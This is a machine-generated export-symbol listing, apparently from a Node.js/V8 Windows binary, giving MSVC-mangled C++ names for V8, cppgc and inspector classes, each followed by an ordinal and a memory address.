                                                                                                                                                                                                        ??YBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@H@Z25170x1409131e0
                                                                                                                                                                                                        ??YTimeDelta@base@v8@@QEAAAEAV012@AEBV012@@Z25180x140e5f890
                                                                                                                                                                                                        ??Z?$TimeBase@VThreadTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVThreadTicks@23@VTimeDelta@23@@Z25190x140e5f8a0
                                                                                                                                                                                                        ??Z?$TimeBase@VTime@base@v8@@@time_internal@base@v8@@QEAAAEAVTime@23@VTimeDelta@23@@Z25200x140e5f8a0
                                                                                                                                                                                                        ??Z?$TimeBase@VTimeTicks@base@v8@@@time_internal@base@v8@@QEAAAEAVTimeTicks@23@VTimeDelta@23@@Z25210x140e5f8a0
                                                                                                                                                                                                        ??ZBytecodeArrayRandomIterator@interpreter@internal@v8@@QEAAAEAV0123@H@Z25220x140913220
                                                                                                                                                                                                        ??ZTimeDelta@base@v8@@QEAAAEAV012@AEBV012@@Z25230x140e5f8d0
                                                                                                                                                                                                        ??_0TimeDelta@base@v8@@QEAAAEAV012@_J@Z25240x140e5f8e0
                                                                                                                                                                                                        ??_7?$Deserializer@VIsolate@internal@v8@@@internal@v8@@6B@25250x141676540
                                                                                                                                                                                                        ??_7?$Deserializer@VLocalIsolate@internal@v8@@@internal@v8@@6B@25260x141679228
                                                                                                                                                                                                        ??_7?$basic_ios@DU?$char_traits@D@std@@@std@@6B@25270x141b2fa40
                                                                                                                                                                                                        ??_7?$basic_ostream@DU?$char_traits@D@std@@@std@@6B@25280x141b2fa50
                                                                                                                                                                                                        ??_7?$basic_streambuf@DU?$char_traits@D@std@@@std@@6B@25290x141b2f940
                                                                                                                                                                                                        ??_7AccountingAllocator@internal@v8@@6B@25300x141674d18
                                                                                                                                                                                                        ??_7ActivityControl@v8@@6B@25310x141cdea08
                                                                                                                                                                                                        ??_7AddTypeAssertionsReducer@compiler@internal@v8@@6B@25320x141b26998
                                                                                                                                                                                                        ??_7AllocationProfile@v8@@6B@25330x141cde7a8
                                                                                                                                                                                                        ??_7Allocator@ArrayBuffer@v8@@6B@25340x141cde8d8
                                                                                                                                                                                                        ??_7ArrayBufferAllocator@node@@6B@25350x141cdea18
                                                                                                                                                                                                        ??_7AsmCallableType@wasm@internal@v8@@6B@25360x14166f420
                                                                                                                                                                                                        ??_7AsmFunctionType@wasm@internal@v8@@6B@25370x14166f450
                                                                                                                                                                                                        ??_7AsmOverloadedFunctionType@wasm@internal@v8@@6B@25380x14166f480
                                                                                                                                                                                                        ??_7Assembler@internal@v8@@6B@25390x141658d70
                                                                                                                                                                                                        ??_7AssemblerBase@internal@v8@@6B@25400x1416e7448
                                                                                                                                                                                                        ??_7AsyncResource@node@@6B@25410x1415bcb28
                                                                                                                                                                                                        ??_7AsyncStreamingDecoder@wasm@internal@v8@@6B@25420x141660a70
                                                                                                                                                                                                        ??_7BaseSpace@internal@v8@@6B@25430x1416550c8
                                                                                                                                                                                                        ??_7BlockBuilder@interpreter@internal@v8@@6B@25440x1416acd00
                                                                                                                                                                                                        ??_7BoundedPageAllocator@base@v8@@6B@25450x141b141e8
                                                                                                                                                                                                        ??_7BranchElimination@compiler@internal@v8@@6B@25460x141b21590
                                                                                                                                                                                                        ??_7BreakableControlFlowBuilder@interpreter@internal@v8@@6B@25470x1416accf8
                                                                                                                                                                                                        ??_7BytecodeIterator@wasm@internal@v8@@6B@25480x141658fa8
                                                                                                                                                                                                        ??_7BytecodeRegisterOptimizer@interpreter@internal@v8@@6B@25490x1416b02f8
                                                                                                                                                                                                        ??_7Cancelable@internal@v8@@6B@25500x141655030
                                                                                                                                                                                                        ??_7CancelableTask@internal@v8@@6BCancelable@12@@25510x141675c50
                                                                                                                                                                                                        ??_7CancelableTask@internal@v8@@6BTask@2@@25520x141675c60
                                                                                                                                                                                                        ??_7Channel@V8Inspector@v8_inspector@@6B@25530x141cde848
                                                                                                                                                                                                        ??_7CheckpointElimination@compiler@internal@v8@@6B@25540x141b215c8
                                                                                                                                                                                                        ??_7CodeEventHandler@v8@@6B@25550x1416f4480
                                                                                                                                                                                                        ??_7CodeEventLogger@internal@v8@@6B@25560x1416a0bf0
                                                                                                                                                                                                        ??_7CodeGenerator@compiler@internal@v8@@6B@25570x141b1fbf8
                                                                                                                                                                                                        ??_7CommandLineAPIScope@V8InspectorSession@v8_inspector@@6B@25580x14164f928
                                                                                                                                                                                                        ??_7CommonOperatorReducer@compiler@internal@v8@@6B@25590x141b21600
                                                                                                                                                                                                        ??_7CompactionSpace@internal@v8@@6B@25600x1416553f8
                                                                                                                                                                                                        ??_7CompilationJob@internal@v8@@6B@25610x1416555d8
                                                                                                                                                                                                        ??_7CompilationResultResolver@wasm@internal@v8@@6B@25620x141cde7a8
                                                                                                                                                                                                        ??_7ConcurrentMarker@internal@cppgc@@6B@25630x1416525e8
                                                                                                                                                                                                        ??_7ConcurrentMarkerBase@internal@cppgc@@6B@25640x141653cf8
                                                                                                                                                                                                        ??_7ConcurrentMarkingVisitor@internal@cppgc@@6B@25650x1416533b0
                                                                                                                                                                                                        ??_7ConcurrentUnifiedHeapMarkingVisitor@internal@v8@@6B@25660x1416ba6c0
                                                                                                                                                                                                        ??_7ConditionalControlFlowBuilder@interpreter@internal@v8@@6B@25670x1416acd28
                                                                                                                                                                                                        ??_7ConstantFoldingReducer@compiler@internal@v8@@6B@25680x141b28020
                                                                                                                                                                                                        ??_7ContextDeserializer@internal@v8@@6B@25690x141676540
                                                                                                                                                                                                        ??_7ContextSerializer@internal@v8@@6B@25700x1416794c8
                                                                                                                                                                                                        ??_7ControlFlowBuilder@interpreter@internal@v8@@6B@25710x1416accf0
                                                                                                                                                                                                        ??_7CppHeap@internal@v8@@6B02@@25720x1416bab00
                                                                                                                                                                                                        ??_7CppHeap@internal@v8@@6BAllocationObserver@StatsCollector@1cppgc@@@25730x1416bab58
                                                                                                                                                                                                        ??_7CppHeap@internal@v8@@6BEmbedderHeapTracer@2@@25740x1416bab08
                                                                                                                                                                                                        ??_7CppHeap@internal@v8@@6BHeapBase@1cppgc@@@25750x1416baae0
                                                                                                                                                                                                        ??_7CppHeap@v8@@6B@25760x14164f928
                                                                                                                                                                                                        ??_7CsaLoadElimination@compiler@internal@v8@@6B@25770x141b21650
                                                                                                                                                                                                        ??_7DateCache@internal@v8@@6B@25780x1416824f8
                                                                                                                                                                                                        ??_7DbgStreamBuf@internal@v8@@6B@25790x141655658
                                                                                                                                                                                                        ??_7DeadCodeElimination@compiler@internal@v8@@6B@25800x141b280b0
                                                                                                                                                                                                        ??_7DefaultEmbedderRootsHandler@internal@v8@@6B@25810x1416b2dc0
                                                                                                                                                                                                        ??_7DefaultPlatform@cppgc@@6B@25820x141653cc0
                                                                                                                                                                                                        ??_7Delegate@ValueDeserializer@v8@@6B@25830x141cdea68
                                                                                                                                                                                                        ??_7Delegate@ValueSerializer@v8@@6B@25840x141cde8a0
                                                                                                                                                                                                        ??_7DiscardedSamplesDelegate@v8@@6B@25850x141cdea08
                                                                                                                                                                                                        ??_7Domain@API@Schema@protocol@v8_inspector@@6B@25860x14164fc80
                                                                                                                                                                                                        ??_7EmbedderGraph@v8@@6B@25870x141cdeac0
                                                                                                                                                                                                        ??_7EmbedderHeapTracer@v8@@6B@25880x141cde900
                                                                                                                                                                                                        ??_7EmbedderRootsHandler@v8@@6B@25890x141cde848
                                                                                                                                                                                                        ??_7EscapeAnalysisReducer@compiler@internal@v8@@6B@25900x141b28368
                                                                                                                                                                                                        ??_7Exported@protocol@v8_inspector@@6B@25910x14164fc80
                                                                                                                                                                                                        ??_7Extension@v8@@6B@25920x141cdea48
                                                                                                                                                                                                        ??_7ExternalOneByteStringResource@String@v8@@6B@25930x141cde7c0
                                                                                                                                                                                                        ??_7ExternalResourceVisitor@v8@@6B@25940x141cdea58
                                                                                                                                                                                                        ??_7ExternalSourceStream@ScriptCompiler@v8@@6B@25950x141cde868
                                                                                                                                                                                                        ??_7ExternalStringResource@String@v8@@6B@25960x141cde7c0
                                                                                                                                                                                                        ??_7ExternalStringResourceBase@String@v8@@6B@25970x141cde758
                                                                                                                                                                                                        ??_7FlatStringReader@internal@v8@@6B@25980x141655068
                                                                                                                                                                                                        ??_7FreeListMany@internal@v8@@6B@25990x1416ba278
                                                                                                                                                                                                        ??_7FreeListManyCached@internal@v8@@6B@26000x1416ba2c0
                                                                                                                                                                                                        ??_7FreeListManyCachedFastPath@internal@v8@@6B@26010x141655100
                                                                                                                                                                                                        ??_7FreeListManyCachedOrigin@internal@v8@@6B@26020x141655148
                                                                                                                                                                                                        ??_7GCInvoker@internal@cppgc@@6B@26030x141653a98
                                                                                                                                                                                                        ??_7GraphAssembler@compiler@internal@v8@@6B@26040x141b25ef8
                                                                                                                                                                                                        ??_7GraphReducer@compiler@internal@v8@@6B@26050x141b233e0
                                                                                                                                                                                                        ??_7Heap@cppgc@@6B@26060x14164f928
                                                                                                                                                                                                        ??_7Heap@internal@cppgc@@6B02@@26070x141653718
                                                                                                                                                                                                        ??_7Heap@internal@cppgc@@6BGarbageCollector@12@@26080x141653720
                                                                                                                                                                                                        ??_7Heap@internal@cppgc@@6BHeapBase@12@@26090x1416536f8
                                                                                                                                                                                                        ??_7HeapBase@internal@cppgc@@6B@26100x141653978
                                                                                                                                                                                                        ??_7IdentityMapBase@internal@v8@@6B@26110x141658b40
                                                                                                                                                                                                        ??_7Inspectable@V8InspectorSession@v8_inspector@@6B@26120x14164f918
                                                                                                                                                                                                        ??_7InstantiationResultResolver@wasm@internal@v8@@6B@26130x141cde7a8
                                                                                                                                                                                                        ??_7IsolatePlatformDelegate@node@@6B@26140x141cde7f8
                                                                                                                                                                                                        ??_7JSCallReducer@compiler@internal@v8@@6B@26150x141b216b8
                                                                                                                                                                                                        ??_7JSContextSpecialization@compiler@internal@v8@@6B@26160x141b216e8
                                                                                                                                                                                                        ??_7JSCreateLowering@compiler@internal@v8@@6B@26170x141b21720
                                                                                                                                                                                                        ??_7JSGraphAssembler@compiler@internal@v8@@6B@26180x141b20ba0
                                                                                                                                                                                                        ??_7JSHeapCopyReducer@compiler@internal@v8@@6B@26190x141b21758
                                                                                                                                                                                                        ??_7JSIntrinsicLowering@compiler@internal@v8@@6B@26200x141b217f8
                                                                                                                                                                                                        ??_7JSNativeContextSpecialization@compiler@internal@v8@@6B@26210x141b29338
                                                                                                                                                                                                        ??_7JSTypedLowering@compiler@internal@v8@@6B@26220x141b21850
                                                                                                                                                                                                        ??_7JumpTableAssembler@wasm@internal@v8@@6B@26230x1416557e0
                                                                                                                                                                                                        ??_7LargeObjectSpace@internal@v8@@6B@26240x141655218
                                                                                                                                                                                                        ??_7LargePageMemoryRegion@internal@cppgc@@6B@26250x141653050
                                                                                                                                                                                                        ??_7LoadElimination@compiler@internal@v8@@6B@26260x141b21880
                                                                                                                                                                                                        ??_7LoopBuilder@interpreter@internal@v8@@6B@26270x1416acd08
                                                                                                                                                                                                        ??_7MachineOperatorReducer@compiler@internal@v8@@6B@26280x141b218b0
                                                                                                                                                                                                        ??_7MacroAssembler@internal@v8@@6B@26290x1416557e0
                                                                                                                                                                                                        ??_7Marker@internal@cppgc@@6B@26300x141653608
                                                                                                                                                                                                        ??_7MarkerBase@internal@cppgc@@6B@26310x1416535e8
                                                                                                                                                                                                        ??_7MarkingVerifier@internal@cppgc@@6BConservativeTracingVisitor@12@@26320x141653440
                                                                                                                                                                                                        ??_7MarkingVerifier@internal@cppgc@@6BStackVisitor@base@heap@@@26330x141653418
                                                                                                                                                                                                        ??_7MarkingVerifierBase@internal@cppgc@@6BConservativeTracingVisitor@12@@26340x141653428
                                                                                                                                                                                                        ??_7MarkingVerifierBase@internal@cppgc@@6BStackVisitor@base@heap@@@26350x141653418
                                                                                                                                                                                                        ??_7MarkingVisitorBase@internal@cppgc@@6B@26360x141653310
                                                                                                                                                                                                        ??_7MeasureMemoryDelegate@internal@v8@@6B@26370x1416b45c0
                                                                                                                                                                                                        ??_7MeasureMemoryDelegate@v8@@6B@26380x141cdeaf8
                                                                                                                                                                                                        ??_7MemoryMappedFile@OS@base@v8@@6B@26390x141cdeaf8
                                                                                                                                                                                                        ??_7MicrotaskQueue@internal@v8@@6B@26400x1416c7018
                                                                                                                                                                                                        ??_7MicrotaskQueue@v8@@6B@26410x141cde808
                                                                                                                                                                                                        ??_7MultiIsolatePlatform@node@@6B@26420x141cde950
                                                                                                                                                                                                        ??_7MutatorMarkingVisitor@internal@cppgc@@6B@26430x141653360
                                                                                                                                                                                                        ??_7MutatorUnifiedHeapMarkingVisitor@internal@v8@@6B@26440x1416ba668
                                                                                                                                                                                                        ??_7NameConverter@disasm@@6B@26450x1416568b0
                                                                                                                                                                                                        ??_7NameProvider@cppgc@@6B@26460x141cdea08
                                                                                                                                                                                                        ??_7NewSpace@internal@v8@@6B@26470x1416552b0
                                                                                                                                                                                                        ??_7NormalPageMemoryRegion@internal@cppgc@@6B@26480x141653040
                                                                                                                                                                                                        ??_7OFStream@internal@v8@@6B@26490x1416756e0
                                                                                                                                                                                                        ??_7OFStreamBase@internal@v8@@6B@26500x1416555e0
                                                                                                                                                                                                        ??_7ObjectIterator@internal@v8@@6B@26510x141655208
                                                                                                                                                                                                        ??_7Operator@compiler@internal@v8@@6B@26520x141b23468
                                                                                                                                                                                                        ??_7OutputStream@v8@@6B@26530x141cde780
                                                                                                                                                                                                        ??_7PageAllocator@base@v8@@6B@26540x141b13a68
                                                                                                                                                                                                        ??_7PageMemoryRegion@internal@cppgc@@6B@26550x141653030
                                                                                                                                                                                                        ??_7PagedSpace@internal@v8@@6B@26560x141655348
                                                                                                                                                                                                        ??_7PagedSpaceObjectIterator@internal@v8@@6B@26570x141655338
                                                                                                                                                                                                        ??_7PersistentHandleVisitor@v8@@6B@26580x141cdea58
                                                                                                                                                                                                        ??_7Platform@cppgc@@6B@26590x141652568
                                                                                                                                                                                                        ??_7ProfilerCodeObserver@internal@v8@@6B@26600x141695338
                                                                                                                                                                                                        ??_7ProfilerEventsProcessor@internal@v8@@6BCodeEventObserver@12@@26610x1416952f8
                                                                                                                                                                                                        ??_7ProfilerEventsProcessor@internal@v8@@6BThread@base@2@@26620x1416952d8
                                                                                                                                                                                                        ??_7ProfilerListener@internal@v8@@6BCodeEventListener@12@@26630x14168fcf0
                                                                                                                                                                                                        ??_7ProfilerListener@internal@v8@@6BListener@WeakCodeRegistry@12@@26640x14168fd80
                                                                                                                                                                                                        ??_7PropertyIterator@debug@v8@@6B@26650x1416554f0
                                                                                                                                                                                                        ??_7ReadOnlySerializer@internal@v8@@6B@26660x141678b18
                                                                                                                                                                                                        ??_7Recorder@metrics@v8@@6B@26670x141654fb8
                                                                                                                                                                                                        ??_7Reducer@compiler@internal@v8@@6B@26680x141b18538
                                                                                                                                                                                                        ??_7RedundancyElimination@compiler@internal@v8@@6B@26690x141b29fb8
                                                                                                                                                                                                        ??_7RegExpBytecodeGenerator@internal@v8@@6B@26700x141689620
                                                                                                                                                                                                        ??_7RegExpMacroAssemblerX64@internal@v8@@6B@26710x141655c50
                                                                                                                                                                                                        ??_7RegisterConfiguration@internal@v8@@6B@26720x141658cf8
                                                                                                                                                                                                        ??_7RemoteObject@API@Runtime@protocol@v8_inspector@@6B@26730x14164fc80
                                                                                                                                                                                                        ??_7Sampler@sampler@v8@@6B@26740x1416abec0
                                                                                                                                                                                                        ??_7SamplingEventsProcessor@internal@v8@@6BCodeEventObserver@12@@26750x141695328
                                                                                                                                                                                                        ??_7SamplingEventsProcessor@internal@v8@@6BThread@base@2@@26760x141695308
                                                                                                                                                                                                        ??_7ScopeIterator@debug@v8@@6B@26770x1416554f0
                                                                                                                                                                                                        ??_7SearchMatch@API@Debugger@protocol@v8_inspector@@6B@26780x14164fc80
                                                                                                                                                                                                        ??_7SetupIsolateDelegate@internal@v8@@6B@26790x1416acae0
                                                                                                                                                                                                        ??_7SharedTurboAssembler@internal@v8@@6B@26800x1416557b0
                                                                                                                                                                                                        ??_7SimplifiedOperatorReducer@compiler@internal@v8@@6B@26810x141b2ab90
                                                                                                                                                                                                        ??_7SnapshotData@internal@v8@@6B@26820x141658f60
                                                                                                                                                                                                        ??_7Space@internal@v8@@6B@26830x141655190
                                                                                                                                                                                                        ??_7SpaceIterator@internal@v8@@6B@26840x141655060
                                                                                                                                                                                                        ??_7StackTrace@API@Runtime@protocol@v8_inspector@@6B@26850x14164fc80
                                                                                                                                                                                                        ??_7StackTraceId@API@Runtime@protocol@v8_inspector@@6B@26860x14164fc80
                                                                                                                                                                                                        ??_7StackTraceIterator@debug@v8@@6B@26870x141655548
                                                                                                                                                                                                        ??_7StartupSerializer@internal@v8@@6B@26880x1416762e8
                                                                                                                                                                                                        ??_7StreamingDecoder@wasm@internal@v8@@6B@26890x14165d098
                                                                                                                                                                                                        ??_7StreamingProcessor@wasm@internal@v8@@6B@26900x14165d048
                                                                                                                                                                                                        ??_7StringBuffer@v8_inspector@@6B@26910x141cdea08
                                                                                                                                                                                                        ??_7SwitchBuilder@interpreter@internal@v8@@6B@26920x1416acd10
                                                                                                                                                                                                        ??_7SyncStreamingDecoder@wasm@internal@v8@@6B@26930x1416609d8
                                                                                                                                                                                                        ??_7Thread@base@v8@@6B@26940x141b13790
                                                                                                                                                                                                        ??_7TracedGlobalHandleVisitor@EmbedderHeapTracer@v8@@6B@26950x141cde740
                                                                                                                                                                                                        ??_7TracedValue@tracing@v8@@6B@26960x141675c08
                                                                                                                                                                                                        ??_7TryCatchBuilder@interpreter@internal@v8@@6B@26970x1416acd18
                                                                                                                                                                                                        ??_7TryFinallyBuilder@interpreter@internal@v8@@6B@26980x1416acd20
                                                                                                                                                                                                        ??_7TurboAssembler@internal@v8@@6B@26990x1416557e0
                                                                                                                                                                                                        ??_7TurboAssemblerBase@internal@v8@@6B@27000x1416557b0
                                                                                                                                                                                                        ??_7TypeNarrowingReducer@compiler@internal@v8@@6B@27010x141b2ae60
                                                                                                                                                                                                        ??_7TypedOptimization@compiler@internal@v8@@6B@27020x141b2ae88
                                                                                                                                                                                                        ??_7TypedSlotSet@internal@v8@@6B@27030x1416550f8
                                                                                                                                                                                                        ??_7TypedSlots@internal@v8@@6B@27040x1416550f0
                                                                                                                                                                                                        ??_7UnifiedHeapMarkingVerifier@internal@v8@@6BConservativeTracingVisitor@1cppgc@@@27050x141653440
                                                                                                                                                                                                        ??_7UnifiedHeapMarkingVerifier@internal@v8@@6BStackVisitor@base@heap@@@27060x141653418
                                                                                                                                                                                                        ??_7UnifiedHeapMarkingVisitorBase@internal@v8@@6B@27070x1416ba610
                                                                                                                                                                                                        ??_7V8HeapExplorer@internal@v8@@6B@27080x1416928f8
                                                                                                                                                                                                        ??_7V8Inspector@v8_inspector@@6B@27090x14164fa98
                                                                                                                                                                                                        ??_7V8InspectorClient@v8_inspector@@6B@27100x14164f9b8
                                                                                                                                                                                                        ??_7V8InspectorSession@v8_inspector@@6B@27110x14164f930
                                                                                                                                                                                                        ??_7V8StackTrace@v8_inspector@@6B@27120x14164f8b8
                                                                                                                                                                                                        ??_7ValueNumberingReducer@compiler@internal@v8@@6B@27130x141b21950
                                                                                                                                                                                                        ??_7Visitor@cppgc@@6B@27140x141652598
                                                                                                                                                                                                        ??_8?$basic_ostream@DU?$char_traits@D@std@@@std@@7B@27150x14156c2f8
                                                                                                                                                                                                        ??_8OFStream@internal@v8@@7B@27160x1416756e8
                                                                                                                                                                                                        ??_D?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAXXZ27170x1404803d0
                                                                                                                                                                                                        ??_DOFStream@internal@v8@@QEAAXXZ27180x140480410
                                                                                                                                                                                                        ??_FCpuProfilingOptions@v8@@QEAAXXZ27190x14007a020
                                                                                                                                                                                                        ??_FDefaultPlatform@cppgc@@QEAAXXZ27200x1404675e0
                                                                                                                                                                                                        ??_FRawMachineLabel@compiler@internal@v8@@QEAAXXZ27210x140f1d410
                                                                                                                                                                                                        ??_FRegister@interpreter@internal@v8@@QEAAXXZ27220x1404815a0
                                                                                                                                                                                                        ??_FSnapshotCreator@v8@@QEAAXXZ27230x140079da0
                                                                                                                                                                                                        ??_FWasmModule@wasm@internal@v8@@QEAAXXZ27240x1404815b0
                                                                                                                                                                                                        ??_UAlignedSlotAllocator@internal@v8@@CAPEAX_K@Z27250x14044f810
                                                                                                                                                                                                        ??_UErrorThrower@wasm@internal@v8@@CAPEAX_K@Z27260x14044f810
                                                                                                                                                                                                        ??_UEscapableHandleScope@v8@@CAPEAX_K@Z27270x14044f810
                                                                                                                                                                                                        ??_UGlobalGCInfoTable@internal@cppgc@@CAPEAX_K@Z27280x14044f810
                                                                                                                                                                                                        ??_UHandleScope@v8@@CAPEAX_K@Z27290x14044f810
                                                                                                                                                                                                        ??_URegister@interpreter@internal@v8@@CAPEAX_K@Z27300x14044f810
                                                                                                                                                                                                        ??_USealHandleScope@v8@@CAPEAX_K@Z27310x14044f810
                                                                                                                                                                                                        ??_UTryCatch@v8@@CAPEAX_K@Z27320x14044f810
                                                                                                                                                                                                        ??_VAlignedSlotAllocator@internal@v8@@CAXPEAX_K@Z27330x14044f810
                                                                                                                                                                                                        ??_VErrorThrower@wasm@internal@v8@@CAXPEAX_K@Z27340x14044f810
                                                                                                                                                                                                        ??_VEscapableHandleScope@v8@@CAXPEAX_K@Z27350x14044f810
                                                                                                                                                                                                        ??_VGlobalGCInfoTable@internal@cppgc@@CAXPEAX_K@Z27360x14044f810
                                                                                                                                                                                                        ??_VHandleScope@v8@@CAXPEAX_K@Z27370x14044f810
                                                                                                                                                                                                        ??_VRegister@interpreter@internal@v8@@CAXPEAX_K@Z27380x14044f810
                                                                                                                                                                                                        ??_VSealHandleScope@v8@@CAXPEAX_K@Z27390x14044f810
                                                                                                                                                                                                        ??_VTryCatch@v8@@CAXPEAX_K@Z27400x14044f810
                                                                                                                                                                                                        ?Abort@AsyncStreamingDecoder@wasm@internal@v8@@UEAAXXZ27410x1405716f0
                                                                                                                                                                                                        ?Abort@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@W4AbortReason@34@@Z27420x140919110
                                                                                                                                                                                                        ?Abort@OS@base@v8@@SAXXZ27430x140e5faa0
                                                                                                                                                                                                        ?Abort@SyncStreamingDecoder@wasm@internal@v8@@UEAAXXZ27440x140570ac0
                                                                                                                                                                                                        ?Abort@TurboAssembler@internal@v8@@QEAAXW4AbortReason@23@@Z27450x140500aa0
                                                                                                                                                                                                        ?Abort@WasmModuleObjectBuilderStreaming@v8@@QEAAXV?$MaybeLocal@VValue@v8@@@2@@Z27460x140078990
                                                                                                                                                                                                        ?Abort@WasmStreaming@v8@@QEAAXV?$MaybeLocal@VValue@v8@@@2@@Z27470x140544760
                                                                                                                                                                                                        ?Abort@internal@cppgc@@YAXXZ27480x14044f810
                                                                                                                                                                                                        ?AbortAll@LazyCompileDispatcher@internal@v8@@QEAAXXZ27490x140a7b890
                                                                                                                                                                                                        ?AbortCSAAssert@CodeAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@@Z27500x140f1d430
                                                                                                                                                                                                        ?AbortCSAAssert@MachineOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ27510x140eca440
                                                                                                                                                                                                        ?AbortCSAAssert@RawMachineAssembler@compiler@internal@v8@@QEAAXPEAVNode@234@@Z27520x14108c000
                                                                                                                                                                                                        ?AbortConcurrentOptimization@Isolate@internal@v8@@QEAAXW4BlockingBehavior@23@@Z27530x140a0b3a0
                                                                                                                                                                                                        ?AbortJob@LazyCompileDispatcher@internal@v8@@QEAAX_K@Z27540x140a7b9a0
                                                                                                                                                                                                        ?AbortOptimization@OptimizedCompilationInfo@internal@v8@@QEAAXW4BailoutReason@23@@Z27550x140a82760
                                                                                                                                                                                                        ?AbortedCodeGeneration@AssemblerBase@internal@v8@@UEAAXXZ27560x140078990
                                                                                                                                                                                                        ?Abspd@TurboAssembler@internal@v8@@QEAAXVXMMRegister@23@@Z27570x140500c60
                                                                                                                                                                                                        ?Absps@MacroAssembler@internal@v8@@QEAAXVXMMRegister@23@@Z27580x140500d00
                                                                                                                                                                                                        ?AccessorConstant@Descriptor@internal@v8@@SA?AV123@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@W4PropertyAttributes@23@@Z27590x1407dde60
                                                                                                                                                                                                        ?AccountCommitted@BaseSpace@internal@v8@@QEAAX_K@Z27600x140481610
                                                                                                                                                                                                        ?AccountUncommitted@BaseSpace@internal@v8@@QEAAX_K@Z27610x140481630
                                                                                                                                                                                                        ?AccountedFree@PagedSpace@internal@v8@@QEAA_K_K0@Z27620x140481640
                                                                                                                                                                                                        ?AcquireDataOwnership@ScriptData@internal@v8@@QEAAXXZ27630x140528520
                                                                                                                                                                                                        ?ActivationFrameAlignment@OS@base@v8@@SAHXZ27640x1400928d0
                                                                                                                                                                                                        ?ActiveTierIsIgnition@JSFunction@internal@v8@@QEBA_NXZ27650x1408531f0
                                                                                                                                                                                                        ?Add@?$BaseNameDictionary@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VGlobalDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@PEAVInternalIndex@23@@Z27660x1407ef1a0
                                                                                                                                                                                                        ?Add@?$BaseNameDictionary@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VNameDictionary@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@PEAVInternalIndex@23@@Z27670x1407ef250
                                                                                                                                                                                                        ?Add@ArrayList@internal@v8@@SA?AV?$Handle@VArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@2@Z27680x1407ef300
                                                                                                                                                                                                        ?Add@ArrayList@internal@v8@@SA?AV?$Handle@VArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@@Z27690x1407ef500
                                                                                                                                                                                                        ?Add@ArrayList@internal@v8@@SA?AV?$Handle@VArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@VSmi@23@33@Z27700x1407ef670
                                                                                                                                                                                                        ?Add@BitVector@internal@v8@@QEAAXH@Z27710x1404baeb0
                                                                                                                                                                                                        ?Add@ByteData@PreparseDataBuilder@internal@v8@@QEAAXE@Z27720x14079ff00
                                                                                                                                                                                                        ?Add@BytecodeLoopAssignments@compiler@internal@v8@@QEAAXVRegister@interpreter@34@@Z27730x141097280
                                                                                                                                                                                                        ?Add@CodeCommentsWriter@internal@v8@@QEAAXIV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z27740x140ab3590
                                                                                                                                                                                                        ?Add@FreeList@internal@cppgc@@QEAAPEAEUBlock@123@@Z27750x140466970
                                                                                                                                                                                                        ?Add@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@@Z27760x140f3a130
                                                                                                                                                                                                        ?Add@NormalPageMemoryPool@internal@cppgc@@QEAAX_KPEAVNormalPageMemoryRegion@23@PEAE@Z27770x1404587c0
                                                                                                                                                                                                        ?Add@ObjectHashSet@internal@v8@@SA?AV?$Handle@VObjectHashSet@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VObject@internal@v8@@@23@@Z27780x1407efb60
                                                                                                                                                                                                        ?Add@OrderedHashMap@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashMap@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashMap@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2@Z27790x1407e1ee0
                                                                                                                                                                                                        ?Add@OrderedHashMapHandler@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@2@Z27800x1407e2190
                                                                                                                                                                                                        ?Add@OrderedHashSet@internal@v8@@SA?AV?$MaybeHandle@VOrderedHashSet@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VOrderedHashSet@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z27810x1407e2250
                                                                                                                                                                                                        ?Add@OrderedHashSetHandler@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@@Z27820x1407e24e0
                                                                                                                                                                                                        ?Add@OrderedNameDictionaryHandler@internal@v8@@SA?AV?$MaybeHandle@VHeapObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VHeapObject@internal@v8@@@23@V?$Handle@VName@internal@v8@@@23@V?$Handle@VObject@internal@v8@@@23@VPropertyDetails@23@@Z27830x1407e2590
                                                                                                                                                                                                        ?Add@PageMemoryRegionTree@internal@cppgc@@QEAAXPEAVPageMemoryRegion@23@@Z27840x140458810
                                                                                                                                                                                                        ?Add@PrototypeUsers@internal@v8@@SA?AV?$Handle@VWeakArrayList@internal@v8@@@23@PEAVIsolate@23@V423@V?$Handle@VMap@internal@v8@@@23@PEAH@Z27850x1407efd40
                                                                                                                                                                                                        ?Add@Set@v8@@QEAA?AV?$MaybeLocal@VSet@v8@@@2@V?$Local@VContext@v8@@@2@V?$Local@VValue@v8@@@2@@Z27860x140b07ab0
